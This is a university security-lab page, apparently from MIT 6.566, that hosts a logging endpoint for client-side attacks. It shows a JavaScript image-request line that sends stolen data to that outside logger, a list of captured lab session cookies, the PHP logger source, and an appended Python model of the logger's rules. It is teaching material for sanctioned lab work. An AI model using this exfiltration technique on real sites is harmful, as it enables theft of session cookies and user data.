Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

ID: (some identifier to locate your payload in the log)

Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Tue, 22 Apr 2025 09:55:45 -0400: lab4-exchallengepayload: XYCYKXZSDEXJ
Tue, 22 Apr 2025 09:55:25 -0400: lab4-ex9payload: grader/GSHBTDXDVCJZ
Tue, 22 Apr 2025 09:55:14 -0400: lab4-ex8payload: grader/GWZKDJNWMTAA
Tue, 22 Apr 2025 09:54:43 -0400: lab4-ex5payload: PyZoobarLogin=grader#8ff2d199a71da09b420b7ee66a2ae9a3e74f1a3712c5b3ab76e2bed4dcf4d2ef
Tue, 22 Apr 2025 09:54:33 -0400: lab4-ex4payload: PyZoobarLogin=grader#733fc3ccd26d33c9265ce978ba66d0f77d37ae6e31ed2b0ec6e5788aebafc406
Tue, 22 Apr 2025 09:54:15 -0400: lab4-ex2payload: PyZoobarLogin=grader#6dfc6f6e701962c9a5d1dba16a2a1be9093bc05d0c31c53d95306425cafa6c01
Tue, 22 Apr 2025 09:51:27 -0400: lab4-exchallengepayload: MKLHFKDRNREO
Tue, 22 Apr 2025 09:51:09 -0400: lab4-ex9payload: grader/JDSTAXVMLCKY
Tue, 22 Apr 2025 09:50:57 -0400: lab4-ex8payload: grader/QWEXAWJIJUCU
Tue, 22 Apr 2025 09:46:55 -0400: lab4-exchallengepayload: EKWTNCAJONEX
Tue, 22 Apr 2025 09:46:36 -0400: lab4-ex9payload: grader/AKXOUTCPTMYQ
Tue, 22 Apr 2025 09:46:25 -0400: lab4-ex8payload: grader/FRGSTMLXCHHT
Tue, 22 Apr 2025 09:45:55 -0400: lab4-ex5payload: PyZoobarLogin=grader#296d03fd90b47278a1f0e0308003c9658a2c769687f9ed5ed68cab7fa1b75a1a
Tue, 22 Apr 2025 09:45:45 -0400: lab4-ex4payload: PyZoobarLogin=grader#b180d567ad839d9185541103acfeef784e46cf0ac928405642ab9ac973368ce0
Tue, 22 Apr 2025 09:45:20 -0400: lab4-ex2payload: PyZoobarLogin=grader#3838ec30c457c977612ea8474974fa0b940d9a57387d0c3376518a5ab6d9128d
Tue, 22 Apr 2025 09:42:10 -0400: lab4-exchallengepayload: WPUHWQXDNFCT
Tue, 22 Apr 2025 09:41:51 -0400: lab4-ex9payload: grader/QKGZHNJQVXMZ
Tue, 22 Apr 2025 09:41:39 -0400: lab4-ex8payload: grader/GJGGXKQCFIMJ
Tue, 22 Apr 2025 09:41:08 -0400: lab4-ex5payload: PyZoobarLogin=grader#3a0a8562f32457c72d4997e0034ca507e05856ed12f8ebe686825fc0e2db98c6
Tue, 22 Apr 2025 09:40:59 -0400: lab4-ex4payload: PyZoobarLogin=grader#48500c82405105bfa871ba3ebf31147e33b89ac79d762d51a41d96fc4e66146e
Tue, 22 Apr 2025 09:40:20 -0400: lab4-ex2payload: PyZoobarLogin=grader#bc06db58e7f9396bd5f9935044169749c4c4372e59d5873c7a08fcbccebb8829
Tue, 22 Apr 2025 03:58:24 -0400: lab4-exchallengepayload: YGOQFRIRDDQO
Tue, 22 Apr 2025 03:58:02 -0400: lab4-ex9payload: grader/JPIVDPUTHXZW
Tue, 22 Apr 2025 03:57:49 -0400: lab4-ex8payload: grader/VPSFBREURZGD
Tue, 22 Apr 2025 02:49:08 -0400: lab4-ex9payload: grader/XUFIDRBOAAHN
Tue, 22 Apr 2025 02:48:55 -0400: lab4-ex8payload: grader/PNHGGIKSDVWJ
Tue, 22 Apr 2025 02:46:20 -0400: lab4-ex9payload: grader/GKILSQFJTZQD
Tue, 22 Apr 2025 02:46:08 -0400: lab4-ex8payload: grader/QSNJHEEAJFQG
Tue, 22 Apr 2025 02:22:14 -0400: lab4-ex8payload: grader/YQPTPFCJSYYA
Tue, 22 Apr 2025 01:41:11 -0400: lab4-ex5payload: PyZoobarLogin=grader#cd4555bf7c74a2c62d95bda3aa53007e7474e43ff47eb5b815aeea375a069e37
Tue, 22 Apr 2025 01:41:01 -0400: lab4-ex4payload: PyZoobarLogin=grader#25bab4d7bfec108e5c89e8475aba9648f8bfe55ddd6cda59e155700a67ec1632
Tue, 22 Apr 2025 01:40:37 -0400: lab4-ex2payload: PyZoobarLogin=grader#99fcc949a722438cbc7fa1bb9efc36881f4656771c93803a2c7b247b94c70e71
Tue, 22 Apr 2025 01:37:48 -0400: lab4-ex4payload: PyZoobarLogin=grader#87a010fb3eff66fa1074e7d7c1f0b87fbce2094f96c75a24aa7eaf50944b6b85
Tue, 22 Apr 2025 01:37:27 -0400: lab4-ex2payload: PyZoobarLogin=grader#40583ec3e8e9fd2fc167783530feed762e708936c9cdb4a075303b7b7d76fd41
Tue, 22 Apr 2025 01:21:47 -0400: lab4-ex4payload: PyZoobarLogin=grader#ed836d1fb5d52f1d48c54dd2049c08d7fd27018b366db564238961a55e1e34ad
Tue, 22 Apr 2025 01:21:25 -0400: lab4-ex2payload: PyZoobarLogin=grader#52cfb9e1d812ff1bc3dfe9a5e5c7ad9937f9abe4a1ea3dcf33b67895fe81bbf2
Tue, 22 Apr 2025 00:46:54 -0400: lab4-ex4payload: PyZoobarLogin=grader#9c27c40e1ff8ee9b2638aebf34c43063a5ebc0d8e1b3ec821ae705c7d82fa693
Tue, 22 Apr 2025 00:44:31 -0400: lab4-ex4payload: PyZoobarLogin=t#234c516024067f93fe8ea62e84c031df6b118ddc758880fe40a4b90ef194cc4b
Tue, 22 Apr 2025 00:42:40 -0400: test: test-payload
Tue, 22 Apr 2025 00:18:42 -0400: lab4-ex2payload: PyZoobarLogin=grader#13a85c77b489a91ebb2cf5afd2feb3b11f9083d701f7a8572cec2101c4648a5d
Tue, 22 Apr 2025 00:14:48 -0400: lab4-ex2payload: PyZoobarLogin=grader#71d50bdea9fc7a5100a5a727955db4ff88721e1f4e423a3baebdc281fa6b0d0c
Tue, 22 Apr 2025 00:10:02 -0400: lab4-ex2payload: PyZoobarLogin=grader#3d8e94f0ffee487fea9baa6791a7b54c27ede50753c9144d5e81cc6153dbd0cb
Mon, 21 Apr 2025 23:59:37 -0400: lab4-ex2payload: PyZoobarLogin=grader#d3030891a0d8824eb5ee72b25463e2aeaa7e988fa938555ad208514a943e6db2
Mon, 21 Apr 2025 23:57:25 -0400: lab4-ex2payload: PyZoobarLogin=grader#0377a470023cc445f24b27abd9c86fd32c88283cafe8775debfda071a10d7dd9
Mon, 21 Apr 2025 22:51:53 -0400: some identifier: information
Mon, 14 Apr 2025 10:21:36 -0400: student: grader/VLKWGKKGNNNV
Mon, 14 Apr 2025 10:21:26 -0400: student: grader/CXUQKITXKUBO
Mon, 14 Apr 2025 10:20:56 -0400: student: PyZoobarLogin=grader#31dcf27a3fa457790ca5fedd17a9b05107ce2d90853763246f1996b38f2fae51
Mon, 14 Apr 2025 10:20:47 -0400: student: PyZoobarLogin=grader#727ebd37b884df8d248e06ed104c7b05e2d0bc042c7cb452d48733ccdd39da64
Mon, 14 Apr 2025 10:20:27 -0400: student: PyZoobarLogin=grader#9b65a8fac42f503d699c26944786b49dfdf9890fef623faf2d999db230affb5a
Mon, 14 Apr 2025 09:10:19 -0400: student: 123456
Mon, 14 Apr 2025 09:04:10 -0400: my-username: some-string
Mon, 14 Apr 2025 08:40:46 -0400: student: grader/QIJGUCSHNGCO
Mon, 14 Apr 2025 08:40:37 -0400: student: grader/XJGFZQEUFGIW
Mon, 14 Apr 2025 08:40:09 -0400: student: PyZoobarLogin=grader#b1f742deb4a6b2f0e0283881c75b4d812310f0a9ed70d04aa576b745f45e823e
Mon, 14 Apr 2025 08:40:01 -0400: student: PyZoobarLogin=grader#e8d532a9cd808743355b2271f6f265273024f21e666f5dea0a0cc182fbac84fd
Mon, 14 Apr 2025 08:39:44 -0400: student: PyZoobarLogin=grader#b9df0b001c628e05b5fca27a63383e47587a3ad8898c349ae75d7e03559f129c
Mon, 14 Apr 2025 07:30:56 -0400: student: grader/JEECLJHLUIZO
Mon, 14 Apr 2025 07:30:47 -0400: student: grader/ELUALIDWQLYS
Mon, 14 Apr 2025 07:30:19 -0400: student: PyZoobarLogin=grader#2c8ad1567de62b8965141eb6efc745dcf472fd4528c32ab8fcef77ea6c457840
Mon, 14 Apr 2025 07:30:10 -0400: student: PyZoobarLogin=grader#bd99b088e689b10464eb33ad641db889fdef3b87433f96fd2f6d2879dca90f83
Mon, 14 Apr 2025 07:29:51 -0400: student: PyZoobarLogin=grader#43ddb30ac1b758e99560f8b2d8ed1065de102a40aa020ae9326fd3bf7786e878
Mon, 14 Apr 2025 07:27:33 -0400: student: grader/SHCTSVNEURHN
Mon, 14 Apr 2025 07:27:23 -0400: student: grader/OJCSFNGBKWGD
Mon, 14 Apr 2025 07:26:55 -0400: student: PyZoobarLogin=grader#ce1fef1ef165ca9b32e32d856b58632f4820d621415d466cfa3463188b982fbc
Mon, 14 Apr 2025 07:26:45 -0400: student: PyZoobarLogin=grader#1e36d35f9eff8b5a82d29907e62896cd80beafa6356de25ba803e4e4cab51a26
Mon, 14 Apr 2025 07:26:26 -0400: student: PyZoobarLogin=grader#fc690fb48548e03b64e4f44b12e68c9d7599c51cc5a2db149be92d8735c6fb79
Mon, 14 Apr 2025 06:57:01 -0400: student: grader/DXHHILLCEUGU
Mon, 14 Apr 2025 06:56:54 -0400: student: grader/NHBTLYISALSR
Mon, 14 Apr 2025 06:56:36 -0400: student: PyZoobarLogin=grader#62474e933ea8e07af2c21ee274b1c916baa5310c6544a2b46b84f5beefbe22a8
Mon, 14 Apr 2025 06:56:29 -0400: student: PyZoobarLogin=grader#5c8fbadde04dfc519c5184b0816989ec4c16f2a572b5e2b20f14197573156e86
Mon, 14 Apr 2025 06:56:13 -0400: student: PyZoobarLogin=grader#208fe559813a032a9b25320d4e25323747a96454405c82e977a8b6c46d9d0771
Mon, 14 Apr 2025 06:51:25 -0400: student: PyZoobarLogin=grader#0bda2077b325db6b5cd59afcd5e8618ddf01b02e1eab265f2dfb9017448ef904
Mon, 14 Apr 2025 06:51:17 -0400: student: PyZoobarLogin=grader#112527fff893ea2e761dd31989b3c8642e7d7a9a2a94eb8f99fe2cbbbce69874
Mon, 14 Apr 2025 06:50:53 -0400: student: PyZoobarLogin=grader#905503b19cb9893d789a7e9c4a7f5d75a5713a73327cf294edffc058e6e569a1
Mon, 14 Apr 2025 06:30:09 -0400: student: grader/LQWQQUPAHITW
Mon, 14 Apr 2025 06:30:02 -0400: student: grader/QESZKNAANZCU
Mon, 14 Apr 2025 06:29:43 -0400: student: PyZoobarLogin=grader#0f61533164ec42da53edf92691fcad60e0f91313fa04299dd2d59bd4a8087b09
Mon, 14 Apr 2025 06:29:36 -0400: student: PyZoobarLogin=grader#a8bc645842bcea346530875dc413cda7e962c421765985943baf73126264ea29
Mon, 14 Apr 2025 06:29:20 -0400: student: PyZoobarLogin=grader#8e4c0bb39df4d25e14da65e49de92e8b22fb8fecd216ab8931eb96c69dd94be4
Mon, 14 Apr 2025 05:56:17 -0400: student: PyZoobarLogin=grader#dffa4a4263537aa141b174b5d48cdb85fcecd0fecce05a21d58094a51dee6f9d
Mon, 14 Apr 2025 05:56:01 -0400: student: PyZoobarLogin=grader#b312101a12bdc4afa42a35534f249965adfe2cf438e62268b97bea930a037e61
Mon, 14 Apr 2025 04:16:07 -0400: student: PyZoobarLogin=grader#36d73a9352b3299697e926cb4936c0ededfd4c1b6d891d3b7a130f4d2eb75b4a
Mon, 14 Apr 2025 03:53:45 -0400: student: grader/VQMLLHCPUENL
Mon, 14 Apr 2025 03:53:39 -0400: student: grader/QFKSQQOVNMBW
Mon, 14 Apr 2025 03:53:19 -0400: student: PyZoobarLogin=grader#014f4d85b61c0213e680a0d12b07b6b2f66e38a0604bd1ea09561f70ca76a3e2
Mon, 14 Apr 2025 03:53:12 -0400: student: PyZoobarLogin=grader#ddb285e508b953bef121aaf1841ac161c0160ffe0f079ab35e51bbb260a044f6
Mon, 14 Apr 2025 03:52:57 -0400: student: PyZoobarLogin=grader#a68d030e5db2b6abf876f7a2f7bfdd239472835f1073c5f701a7e9db51e3f989
Mon, 14 Apr 2025 03:45:58 -0400: student: grader/CLZZQESLQAJR
Mon, 14 Apr 2025 03:45:51 -0400: student: grader/LQGUXIACMKLP
Mon, 14 Apr 2025 03:45:31 -0400: student: PyZoobarLogin=grader#ba4968bf623a6617feb2fbbd4beceed8d36187efd6260a5f7d6a282b414b176a
Mon, 14 Apr 2025 03:45:24 -0400: student: PyZoobarLogin=grader#7b41f98e7cbdd75e4f4a2a7d2e80993c83a74533e3bce4ae4fdcc3e18526e49f
Mon, 14 Apr 2025 03:45:09 -0400: student: PyZoobarLogin=grader#2404866a74687dc190c678b7fe163dfd10fa221987bdea8c457419deccbc2719
Sun, 13 Apr 2025 10:21:11 -0400: student: grader/HJYTEXCKPDUV
Sun, 13 Apr 2025 10:21:03 -0400: student: grader/AIBOYPNHCPTW
Sun, 13 Apr 2025 10:20:45 -0400: student: PyZoobarLogin=grader#458a5ab3fdb8e49c26d88ac179a8f36ee36c14c397f697f1c60bd9b5affb107d
Sun, 13 Apr 2025 10:20:38 -0400: student: PyZoobarLogin=grader#ccc4202fdb0679187962beb1434bf87b58e4a7e07308b0815e89c183d5fe2321
Sun, 13 Apr 2025 10:20:23 -0400: student: PyZoobarLogin=grader#d0288f5b23d4d584d49d1903950cec9d3b3db42eb65cbeca2733e9a504d46ab9
Sun, 13 Apr 2025 10:18:54 -0400: student: grader/TELVSGBCECQU
Sun, 13 Apr 2025 10:18:47 -0400: student: grader/KJXAMDMMXRIO
Sun, 13 Apr 2025 10:18:28 -0400: student: PyZoobarLogin=grader#641610606998fc737f5562d61270e050129b769a629d8bdadf1a8448027d4912

Source code

In case you are curious, here is the source code of this page.


<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    // apcu_add only succeeds if the key is not already cached; the 5-second TTL
    // makes it a simple per-payload rate limiter
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // strip line breaks so a request cannot forge extra log lines
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // keep at most the 100 most recent old lines, then rewrite the file with
    // the new entry first
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
        // HTML-encode the log so a logged payload cannot execute as markup on this page
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
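The PHP source above packs several defensive rules into one handler: 1000-byte limits on both fields, PHP's `empty()` check, a 5-second per-payload duplicate window via APCu, newline stripping so a request cannot forge extra log lines, and a log bounded to the newest entry plus 100 older lines. The following Python model is an added example, not code from the lab page or its script; it re-implements those rules in memory so you can see which request is rejected with which status, and pairs them with a parser for the `date: id: payload` lines the script writes, since the page says the ID is what lets you find your own entries. `LogStore`, `record_entry`, `parse_entries`, `entries_for` and the demo functions are names chosen here; `SAMPLE_LOG` is built from two entries in the listing above.

```python
"""Python model of the lab logging script's rules and a parser for its log.

Added example: not part of the 6.566 lab page or its PHP script. The class and
function names are assumptions for this illustration; the limits (1000 bytes,
5-second duplicate window, 100 retained lines, newest first) come from the PHP.
"""
import re
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

MAX_FIELD_BYTES = 1000    # strlen($id) / strlen($payload) limit in the PHP
DUPLICATE_WINDOW_S = 5    # TTL passed to apcu_add($payload, true, 5)
MAX_RETAINED_LINES = 100  # the PHP re-writes at most 100 old lines


def sanitize(field: str) -> str:
    """Mirror str_replace(array("\\n", "\\r"), '.', ...): a field must not be able
    to end the log line early or forge additional lines."""
    return field.replace("\n", ".").replace("\r", ".")


class LogStore:
    """In-memory stand-in for /tmp/6.566-2024-logger.txt plus the APCu cache."""

    def __init__(self):
        self.lines = []     # newest entry first, as in the file
        self._recent = {}   # payload -> time it was last accepted

    def record_entry(self, entry_id, payload, now):
        """Apply the PHP checks in the same order; return (http_status, message)."""
        if len(entry_id.encode()) > MAX_FIELD_BYTES:
            return 413, "ID value is larger than 1000 bytes"
        if payload is None:
            return 400, "No payload given"
        if payload in ("", "0"):  # PHP empty() also treats "0" as empty
            return 400, "Empty payload given"
        if len(payload.encode()) > MAX_FIELD_BYTES:
            return 413, "Payload is larger than 1000 bytes"
        last = self._recent.get(payload)
        if last is not None and now - last < timedelta(seconds=DUPLICATE_WINDOW_S):
            return 429, "That exact payload was sent very recently; rejecting"
        self._recent[payload] = now
        line = f"{format_datetime(now)}: {sanitize(entry_id)}: {sanitize(payload)}"
        # prepend the new entry and keep at most 100 of the previous lines
        self.lines = [line] + self.lines[:MAX_RETAINED_LINES]
        return 200, "Logged!"

    def text(self):
        return "".join(line + "\n" for line in self.lines)


# RFC 2822 date, then ": ", then the rest of the line
DATE_RE = re.compile(r"^(\w{3}, \d{1,2} \w{3} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*)$")


def parse_entries(text):
    """Parse 'date: id: payload' lines into (datetime, id, payload) tuples.
    The first ': ' after the date ends the id, so an id containing ': ' is
    ambiguous in this format; payloads may contain ': ' freely."""
    out = []
    for raw in text.splitlines():
        m = DATE_RE.match(raw)
        if not m:
            continue
        entry_id, sep, payload = m.group(2).partition(": ")
        if not sep:
            continue
        out.append((parsedate_to_datetime(m.group(1)), entry_id, payload))
    return out


def entries_for(text, entry_id):
    """Only the entries logged under one id, newest first."""
    return [(d, p) for d, i, p in parse_entries(text) if i == entry_id]


# Two entries copied from the page's own listing, used as sample input.
SAMPLE_LOG = (
    "Tue, 22 Apr 2025 00:42:40 -0400: test: test-payload\n"
    "Mon, 14 Apr 2025 09:04:10 -0400: my-username: some-string\n"
)


def demo():
    """Send five constructed requests; return their statuses and the log text."""
    t0 = datetime(2025, 4, 22, 9, 0, 0, tzinfo=timezone(timedelta(hours=-4)))
    store = LogStore()
    statuses = [
        store.record_entry("my-username", "some-string", t0)[0],                           # 200
        store.record_entry("my-username", "some-string", t0 + timedelta(seconds=2))[0],    # 429 duplicate
        store.record_entry("my-username", "line1\nline2", t0 + timedelta(seconds=3))[0],   # 200, newline dotted
        store.record_entry("my-username", "", t0 + timedelta(seconds=4))[0],               # 400 empty
        store.record_entry("my-username", "x" * 1001, t0 + timedelta(seconds=5))[0],       # 413 too large
    ]
    return statuses, store.text()


def retention_demo(n=150):
    """Log n distinct payloads; return how many lines the file keeps."""
    store = LogStore()
    start = datetime(2025, 1, 1, tzinfo=timezone.utc)
    for i in range(n):
        store.record_entry("u", f"p{i}", start + timedelta(seconds=10 * i))
    return len(store.lines)


if __name__ == "__main__":
    statuses, text = demo()
    print(statuses)
    print(text, end="")
    print(retention_demo(), "lines retained")
```

Note that the retained-line count settles at 101, not 100: the PHP reads up to 100 old lines and then writes the new entry in front of them, and the model keeps that behaviour.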